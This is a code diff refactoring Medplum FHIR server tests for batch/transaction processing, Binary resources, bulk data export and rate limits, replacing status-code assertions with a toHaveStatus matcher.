       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(transaction);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.resourceType).toStrictEqual('OperationOutcome');
 
     const res3 = await request(app)
@@ -462,7 +462,7 @@ describe('Batch and Transaction processing', () => {
       .send({ resourceType: 'Patient' });
     // Although DELETE was processed before the failed POST in the transaction,
     // rollback means the resource should still exist after the transaction fails
-    expect(res3.status).toStrictEqual(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body).toMatchObject<Patient>({
       resourceType: 'Patient',
       id: toDelete.id,
@@ -475,7 +475,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('hello');
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Conditional create in transaction', async () => {
@@ -492,7 +492,7 @@ describe('Batch and Transaction processing', () => {
         resourceType: 'Practitioner',
         identifier: [{ system: 'http://hl7.org.fhir/sid/us-npi', value: practitionerIdentifier }],
       });
-    expect(createdPractitioner.status).toStrictEqual(201);
+    expect(createdPractitioner).toHaveStatus(201);
     const practitionerReference = {
       reference: 'Practitioner?identifier=http://hl7.org.fhir/sid/us-npi|' + practitionerIdentifier,
     };
@@ -595,7 +595,7 @@ describe('Batch and Transaction processing', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(tx);
 
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const ccreateResult = res.body.entry[0].response as BundleEntryResponse;
     expect(ccreateResult.status).toStrictEqual('201');
   });
@@ -608,7 +608,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient', identifier: [{ value: patientIdentifier }] });
-    expect(createdPatient.status).toStrictEqual(201);
+    expect(createdPatient).toHaveStatus(201);
     const patient = createdPatient.body;
 
     const tx: Bundle = {
@@ -632,7 +632,7 @@ describe('Batch and Transaction processing', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(tx);
 
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const updateResult = res.body.entry[0].response as BundleEntryResponse;
     expect(updateResult.status).toStrictEqual('200');
   });
@@ -644,7 +644,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient', name: [{ family: 'Doe', given: ['Jane'] }] });
-    expect(patient1Res.status).toStrictEqual(201);
+    expect(patient1Res).toHaveStatus(201);
     const patient1 = patient1Res.body as WithId<Patient>;
 
     const patient2Res = await request(app)
@@ -652,7 +652,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient', name: [{ family: 'Johnson', given: ['Bob'] }], active: true });
-    expect(patient2Res.status).toStrictEqual(201);
+    expect(patient2Res).toHaveStatus(201);
     const patient2 = patient2Res.body as WithId<Patient>;
 
     // Read the current version of resources to get versionIds
@@ -704,7 +704,7 @@ describe('Batch and Transaction processing', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(transactionBundle);
 
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const resultBundle = res.body as Bundle;
     expect(resultBundle.entry).toHaveLength(2);
 
@@ -736,7 +736,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient', name: [{ family: 'Doe', given: ['Jane'] }] });
-    expect(patientRes.status).toStrictEqual(201);
+    expect(patientRes).toHaveStatus(201);
     const patient = patientRes.body as WithId<Patient>;
 
     // Read the current version
@@ -780,7 +780,7 @@ describe('Batch and Transaction processing', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(transactionBundle);
 
-    expect(res.status).toStrictEqual(412);
+    expect(res).toHaveStatus(412);
   });
 
   test('Conditional update (create-as-update) in transaction', async () => {
@@ -797,7 +797,7 @@ describe('Batch and Transaction processing', () => {
         resourceType: 'Practitioner',
         identifier: [{ system: 'http://hl7.org.fhir/sid/us-npi', value: practitionerIdentifier }],
       });
-    expect(createdPractitioner.status).toStrictEqual(201);
+    expect(createdPractitioner).toHaveStatus(201);
     const practitionerReference = {
       reference: 'Practitioner?identifier=http://hl7.org.fhir/sid/us-npi|' + practitionerIdentifier,
     };
@@ -807,7 +807,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient' });
-    expect(createdPatient.status).toStrictEqual(201);
+    expect(createdPatient).toHaveStatus(201);
     const patient = createdPatient.body;
     const patientReference = createReference(patient);
     const careTeamCondition = 'CareTeam?subject=' + patientReference.reference;
@@ -913,7 +913,7 @@ describe('Batch and Transaction processing', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(tx);
 
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const ccreateResult = res.body.entry[0].response as BundleEntryResponse;
     expect(ccreateResult.status).toStrictEqual('201');
 
@@ -961,7 +961,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(transaction);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toStrictEqual('Bundle');
   });
 
@@ -1009,7 +1009,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(transaction);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.resourceType).toStrictEqual('OperationOutcome');
 
     const res2 = await request(app)
@@ -1017,7 +1017,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send();
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.entry).toBeUndefined();
   });
 
@@ -1033,7 +1033,7 @@ describe('Batch and Transaction processing', () => {
         resourceType: 'Practitioner',
         identifier: [{ system: 'http://hl7.org.fhir/sid/us-npi', value: practitionerIdentifier }],
       });
-    expect(createdPractitioner.status).toStrictEqual(201);
+    expect(createdPractitioner).toHaveStatus(201);
     const practitionerReference = {
       reference: 'Practitioner?identifier=http://hl7.org.fhir/sid/us-npi|' + practitionerIdentifier,
     };
@@ -1060,7 +1060,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(transaction);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toStrictEqual('Bundle');
 
     const patient = (res.body as Bundle).entry?.[0]?.resource as WithId<Patient>;
@@ -1090,7 +1090,7 @@ describe('Batch and Transaction processing', () => {
           },
         ],
       });
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const bundle = res.body as Bundle;
     expect(bundle.entry).toHaveLength(1);
     expect(bundle.entry?.[0]?.response?.status).toStrictEqual('400');
@@ -1170,7 +1170,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(bundle);
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const result = res.body as Bundle;
     expect(result.entry).toHaveLength(3);
     expect(result.entry?.map((e) => e.response?.status)).toStrictEqual(['201', '201', '201']);
@@ -1180,7 +1180,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(bundle);
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     const result2 = res2.body as Bundle;
     expect(result2.entry).toHaveLength(3);
     expect(result2.entry?.map((e) => e.response?.status)).toStrictEqual(['200', '200', '200']);
@@ -1212,7 +1212,7 @@ describe('Batch and Transaction processing', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Prefer', 'respond-async')
       .send(bundle);
-    expect(res.status).toStrictEqual(202);
+    expect(res).toHaveStatus(202);
     const outcome = res.body as OperationOutcome;
     expect(outcome.issue[0].diagnostics).toMatch('http://');
 
@@ -1241,7 +1241,7 @@ describe('Batch and Transaction processing', () => {
       .get(`/fhir/R4/${resultsReference}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(res2.status).toStrictEqual(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body).toMatchObject<Partial<Bundle>>({
       resourceType: 'Bundle',
       type: 'batch-response',
@@ -1263,7 +1263,7 @@ describe('Batch and Transaction processing', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Prefer', 'respond-async')
       .send(bundle);
-    expect(res.status).toStrictEqual(202);
+    expect(res).toHaveStatus(202);
     const outcome = res.body as OperationOutcome;
     expect(outcome.issue[0].diagnostics).toMatch('http://');
 
@@ -1322,7 +1322,7 @@ describe('Batch and Transaction processing', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Prefer', 'respond-async')
       .send(bundle);
-    expect(res.status).toStrictEqual(202);
+    expect(res).toHaveStatus(202);
     const outcome = res.body as OperationOutcome;
 
     const job = mockBatchJob(queue.add.mock.calls[0][1] as ReentrantBatchJobData);
@@ -1350,7 +1350,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('X-Medplum', 'extended')
       .send();
-    expect(inProgress.status).toStrictEqual(202);
+    expect(inProgress).toHaveStatus(202);
 
     // Resume on a fresh worker: it rehydrates from durable state and finishes the batch.
     const resumeJob = mockBatchJob(job.data);
@@ -1364,7 +1364,7 @@ describe('Batch and Transaction processing', () => {
       .get(`/fhir/R4/${resultsReference}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(res2.status).toStrictEqual(200);
+    expect(res2).toHaveStatus(200);
     const results = res2.body as Bundle;
     expect(results.type).toStrictEqual('batch-response');
     // All four entries are present exactly once, across the pre- and post-resume runs.
@@ -1391,7 +1391,7 @@ describe('Batch and Transaction processing', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Prefer', 'respond-async')
       .send(bundle);
-    expect(res.status).toStrictEqual(202);
+    expect(res).toHaveStatus(202);
     const outcome = res.body as OperationOutcome;
     const jobUrl = outcome.issue[0].diagnostics as string;
     const asyncJobId = new URL(jobUrl).pathname.split('/').at(-2) as string;
@@ -1412,7 +1412,7 @@ describe('Batch and Transaction processing', () => {
       .post(`/fhir/R4/AsyncJob/${asyncJobId}/$cancel`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(cancelRes.status).toStrictEqual(200);
+    expect(cancelRes).toHaveStatus(200);
 
     // Resuming a cancelled job must not process further entries; it publishes partial results.
     const resumeJob = mockBatchJob(job.data);
@@ -1423,7 +1423,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('X-Medplum', 'extended')
       .send();
-    expect(cancelled.status).toStrictEqual(200);
+    expect(cancelled).toHaveStatus(200);
     expect(cancelled.body.status).toStrictEqual('cancelled');
     const partialRef = cancelled.body.output?.parameter?.find((p: any) => p.name === 'partialResults')?.valueReference
       ?.reference;
@@ -1433,7 +1433,7 @@ describe('Batch and Transaction processing', () => {
       .get(`/fhir/R4/${partialRef}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(res2.status).toStrictEqual(200);
+    expect(res2).toHaveStatus(200);
     const partial = res2.body as Bundle;
     expect(partial.type).toStrictEqual('batch-response');
     // Only the entries processed before cancellation have results; the rest are absent.
@@ -1480,7 +1480,7 @@ describe('Batch and Transaction processing', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('X-Medplum', 'extended')
       .send(transaction);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toStrictEqual('Bundle');
 
     const response = res.body as Bundle;
@@ -1530,7 +1530,7 @@ describe('Batch and Transaction processing', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('X-Medplum', 'extended')
       .send(batch);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toStrictEqual('Bundle');
 
     const response = res.body as Bundle;
@@ -1584,7 +1584,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(transaction);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toStrictEqual('Bundle');
 
     const results = res.body as Bundle;
@@ -1597,7 +1597,7 @@ describe('Batch and Transaction processing', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .send();
 
-    expect(query.status).toBe(200);
+    expect(query).toHaveStatus(200);
     expect(query.body.entry).toHaveLength(1);
   });
 
@@ -1640,7 +1640,7 @@ describe('Batch and Transaction processing', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(batch);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toStrictEqual('Bundle');
 
     const results = res.body as Bundle;
@@ -1698,7 +1698,7 @@ describe('Batch and Transaction processing', () => {
       .set('X-Medplum', 'extended')
       .set('Prefer', 'respond-async')
       .send(batch);
-    expect(res.status).toBe(202);
+    expect(res).toHaveStatus(202);
     const outcome = res.body as OperationOutcome;
     expect(outcome.issue[0].diagnostics).toMatch('http://');
 
@@ -1761,7 +1761,7 @@ describe('Batch and Transaction processing', () => {
       .get(`/fhir/R4/${resultsReference}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .send();
-    expect(res2.status).toStrictEqual(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body).toMatchObject<Partial<Bundle>>({ resourceType: 'Bundle', type: 'batch-response' });
 
     const results = res2.body as Bundle;
@@ -1879,7 +1879,7 @@ describe('Transaction bundle SERIALIZABLE retry', () => {
     expect(commitFailuresInjected).toBe(1);
 
     // The server reports success to the client...
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const responseBundle = res.body as Bundle;
     expect(responseBundle.type).toBe('transaction-response');
     expect(responseBundle.entry?.map((e) => e.response?.status)).toStrictEqual(['201', '201', '201']);
@@ -1892,13 +1892,13 @@ describe('Transaction bundle SERIALIZABLE retry', () => {
     const patientSearch = await request(app)
       .get(`/fhir/R4/Patient?identifier=http://example.com/mrn|${identifier}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(patientSearch.status).toBe(200);
+    expect(patientSearch).toHaveStatus(200);
     expect((patientSearch.body as Bundle).entry).toHaveLength(1);
 
     const coverageSearch = await request(app)
       .get(`/fhir/R4/Coverage?beneficiary=${createdPatientRef}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(coverageSearch.status).toBe(200);
+    expect(coverageSearch).toHaveStatus(200);
     expect((coverageSearch.body as Bundle).entry).toHaveLength(2);
   });
 });

--- a/packages/server/src/fhir/binary.test.ts
+++ b/packages/server/src/fhir/binary.test.ts
@@ -32,13 +32,13 @@ describe('Binary', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('Hello world');
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
 
     const binary = res.body;
     const res2 = await request(app)
       .get('/fhir/R4/Binary/' + binary.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.text).toStrictEqual('Hello world');
 
     // Read as FHIR JSON
@@ -46,7 +46,7 @@ describe('Binary', () => {
       .get('/fhir/R4/Binary/' + binary.id)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Accept', ContentType.FHIR_JSON);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.resourceType).toBe('Binary');
   });
 
@@ -54,7 +54,7 @@ describe('Binary', () => {
     const res = await request(app)
       .get('/fhir/R4/Binary/2e9dfab6-a3af-4e5b-9324-483b4c333737')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('Update and read binary', async () => {
@@ -63,7 +63,7 @@ describe('Binary', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('Hello world');
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
 
     const binary = res.body;
     const res2 = await request(app)
@@ -71,12 +71,12 @@ describe('Binary', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('Hello world 2');
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     const res3 = await request(app)
       .get('/fhir/R4/Binary/' + binary.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.text).toStrictEqual('Hello world 2');
   });
 
@@ -87,7 +87,7 @@ describe('Binary', () => {
       .set('Content-Type', ContentType.TEXT)
       .set('Origin', 'http://localhost:3000')
       .send('Hello world');
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
     expect(res.headers['access-control-allow-origin']).toBe('http://localhost:3000');
   });
 
@@ -98,7 +98,7 @@ describe('Binary', () => {
       .set('Content-Type', ContentType.TEXT)
       .set('Content-Encoding', 'fake')
       .send('Hello world');
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Deflate', async () => {
@@ -108,13 +108,13 @@ describe('Binary', () => {
       .set('Content-Type', ContentType.TEXT)
       .set('Content-Encoding', 'deflate')
       .send(await createBufferForStream('Hello world', zlib.createDeflate()));
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
 
     const binary = res.body;
     const res2 = await request(app)
       .get('/fhir/R4/Binary/' + binary.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.text).toStrictEqual('Hello world');
   });
 
@@ -125,13 +125,13 @@ describe('Binary', () => {
       .set('Content-Type', ContentType.TEXT)
       .set('Content-Encoding', 'gzip')
       .send(await createBufferForStream('Hello world', zlib.createGzip()));
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
 
     const binary = res.body;
     const res2 = await request(app)
       .get('/fhir/R4/Binary/' + binary.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.text).toStrictEqual('Hello world');
   });
 
@@ -141,7 +141,7 @@ describe('Binary', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('Hello world');
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
 
     const binary = res.body;
     const res2 = await request(app)
@@ -150,12 +150,12 @@ describe('Binary', () => {
       .set('Content-Type', ContentType.TEXT)
       .set('Content-Encoding', 'gzip')
       .send(await createBufferForStream('Hello world 2', zlib.createGzip()));
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     const res3 = await request(app)
       .get('/fhir/R4/Binary/' + binary.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.text).toStrictEqual('Hello world 2');
   });
 
@@ -185,7 +185,7 @@ describe('Binary', () => {
           },
         ],
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const result = res.body as Bundle;
     expect(result).toBeDefined();
@@ -211,7 +211,7 @@ describe('Binary', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('Hello world');
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
 
     const binary = res.body;
 
@@ -220,7 +220,7 @@ describe('Binary', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient' });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const patient = res1.body;
 
@@ -229,13 +229,13 @@ describe('Binary', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ ...binary, securityContext: createReference(patient) });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     const res3 = await request(app)
       .get('/fhir/R4/Binary/' + binary.id)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Accept', ContentType.FHIR_JSON);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.securityContext.reference).toStrictEqual(`Patient/${patient.id}`);
   });
 
@@ -245,7 +245,7 @@ describe('Binary', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('Hello world');
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
 
     const binary = res.body;
     const res2 = await request(app)
@@ -256,13 +256,13 @@ describe('Binary', () => {
         ...binary,
         data: 'Hello, world!', // Invalid: not encoded as base64Binary
       });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
 
     const res3 = await request(app)
       .get('/fhir/R4/Binary/' + binary.id)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Accept', ContentType.FHIR_JSON);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.data).toBeUndefined();
   });
 
@@ -272,7 +272,7 @@ describe('Binary', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('Hello world');
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
 
     const binary = res.body;
 
@@ -282,12 +282,12 @@ describe('Binary', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient' });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     const res3 = await request(app)
       .get('/fhir/R4/Binary/' + binary.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.text).toStrictEqual('{"resourceType":"Patient"}');
   });
 
@@ -297,7 +297,7 @@ describe('Binary', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', 'application/x-msdownload')
       .send('Hello world');
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0]).toMatchObject<OperationOutcomeIssue>({ severity: 'error', code: 'invalid' });
 
     const res2 = await request(app)
@@ -306,7 +306,7 @@ describe('Binary', () => {
       .set('Content-Type', 'application/octet-stream')
       .query({ _filename: 'foo.exe' })
       .send('Hello world');
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue[0]).toMatchObject<OperationOutcomeIssue>({ severity: 'error', code: 'invalid' });
   });
 });

--- a/packages/server/src/fhir/bulkdata.test.ts
+++ b/packages/server/src/fhir/bulkdata.test.ts
@@ -43,7 +43,7 @@ describe('Binary', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('X-Medplum', 'extended');
-    expect(initRes.status).toBe(200);
+    expect(initRes).toHaveStatus(200);
     expect(initRes.body).toMatchObject({
       request: exportResource.request,
       output: exportResource.output,
@@ -68,13 +68,13 @@ describe('Binary', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('X-Medplum', 'extended');
-    expect(cancelRes.status).toBe(202);
+    expect(cancelRes).toHaveStatus(202);
 
     const initRes = await request(app)
       .get('/fhir/R4/bulkdata/export/' + exportResource.id)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('X-Medplum', 'extended');
-    expect(initRes.status).toBe(404);
+    expect(initRes).toHaveStatus(404);
   });
 });

--- a/packages/server/src/fhir/fhirquota.test.ts
+++ b/packages/server/src/fhir/fhirquota.test.ts
@@ -46,17 +46,17 @@ describe('FHIR Rate Limits', () => {
 
     // Allow first request
     const res = await request(app).get('/fhir/R4/Patient?_count=20').auth(accessToken, { type: 'bearer' }).send();
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.get('ratelimit')).toStrictEqual('"fhirInteractions";r=0;t=60');
 
     // Block next request
     const res2 = await request(app).get('/fhir/R4/Patient?_count=20').auth(accessToken, { type: 'bearer' }).send();
-    expect(res2.status).toBe(429);
+    expect(res2).toHaveStatus(429);
     expect(res2.get('ratelimit')).toStrictEqual('"fhirInteractions";r=0;t=60');
 
     // Block subsequent request
     const res3 = await request(app).get('/fhir/R4/Patient?_count=20').auth(accessToken, { type: 'bearer' }).send();
-    expect(res3.status).toBe(429);
+    expect(res3).toHaveStatus(429);
     expect(res3.get('ratelimit')).toStrictEqual('"fhirInteractions";r=0;t=60');
   });
 
@@ -69,7 +69,7 @@ describe('FHIR Rate Limits', () => {
       .post('/fhir/R4/Patient')
       .auth(accessToken, { type: 'bearer' })
       .send({ resourceType: 'Patient' });
-    expect(res.status).toBe(429);
+    expect(res).toHaveStatus(429);
   });
 
   test('Allows requests when rate limits are disabled', async () => {
@@ -82,7 +82,7 @@ describe('FHIR Rate Limits', () => {
       .post('/fhir/R4/Patient')
       .auth(accessToken, { type: 'bearer' })
       .send({ resourceType: 'Patient' });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
     expect(res.get('ratelimit')).toBeUndefined();
   });
 
@@ -99,7 +99,7 @@ describe('FHIR Rate Limits', () => {
         type: 'batch',
         entry: [{ request: { method: 'GET', url: 'Patient' } }],
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Blocks oversized transaction bundle', async () => {
@@ -119,7 +119,7 @@ describe('FHIR Rate Limits', () => {
         type: 'transaction',
         entry: [{ request: { method: 'GET', url: 'Patient' } }, { request: { method: 'GET', url: 'Practitioner' } }],
       } satisfies Bundle);
-    expect(res.status).toBe(429);
+    expect(res).toHaveStatus(429);
   });
 
   test('Reports multiple, in-progress rate limits', async () => {
@@ -129,13 +129,13 @@ describe('FHIR Rate Limits', () => {
     ({ accessToken } = await createTestProject({ withAccessToken: true }));
 
     const res = await request(app).get('/fhir/R4/Patient?_count=20').auth(accessToken, { type: 'bearer' }).send();
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.get('ratelimit')).toStrictEqual('"requests";r=99;t=60, "fhirInteractions";r=480;t=60');
 
     await sleep(1000);
 
     const res2 = await request(app).get('/fhir/R4/Patient?_count=20').auth(accessToken, { type: 'bearer' }).send();
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.get('ratelimit')).toStrictEqual('"requests";r=98;t=59, "fhirInteractions";r=460;t=59');
   });
 
@@ -152,7 +152,7 @@ describe('FHIR Rate Limits', () => {
       .post('/fhir/R4/Patient')
       .auth(accessToken, { type: 'bearer' })
       .send({ resourceType: 'Patient' });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
   });
 
   test('Respects ProjectMembership setting override', async () => {
@@ -179,7 +179,7 @@ describe('FHIR Rate Limits', () => {
       .post('/fhir/R4/Patient')
       .auth(accessToken, { type: 'bearer' })
       .send({ resourceType: 'Patient' });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
   });
 
   test('Respects Project level limit', async () => {
@@ -204,14 +204,14 @@ describe('FHIR Rate Limits', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(loginRes.status).toBe(200);
+    expect(loginRes).toHaveStatus(200);
 
     const tokenRes = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: loginRes.body.code,
       code_verifier: 'xyz',
     });
-    expect(tokenRes.status).toBe(200);
+    expect(tokenRes).toHaveStatus(200);
     expect(tokenRes.body.access_token).toBeDefined();
     const otherToken = tokenRes.body.access_token;
 
@@ -219,13 +219,13 @@ describe('FHIR Rate Limits', () => {
       .post('/fhir/R4/Patient')
       .auth(accessToken, { type: 'bearer' })
       .send({ resourceType: 'Patient' });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
 
     const res2 = await request(app)
       .post('/fhir/R4/Patient')
       .auth(otherToken, { type: 'bearer' })
       .send({ resourceType: 'Patient' });
-    expect(res2.status).toBe(429);
+    expect(res2).toHaveStatus(429);
   });
 
   test('Tracks active consumer in sorted set after FHIR activity', async () => {
@@ -235,7 +235,7 @@ describe('FHIR Rate Limits', () => {
 
     // Make a FHIR request to trigger rate limit consumption
     const res = await request(app).get('/fhir/R4/Patient').auth(accessToken, { type: 'bearer' }).send();
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     // Check the active consumer sorted set for the current minute bucket
     const redis = getRateLimitRedis();
@@ -255,7 +255,7 @@ describe('FHIR Rate Limits', () => {
     const { accessToken, project, membership } = await createTestProject({ withAccessToken: true, withClient: true });
 
     const res = await request(app).get('/fhir/R4/Patient').auth(accessToken, { type: 'bearer' }).send();
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     // Check that the next minute bucket also has the membership
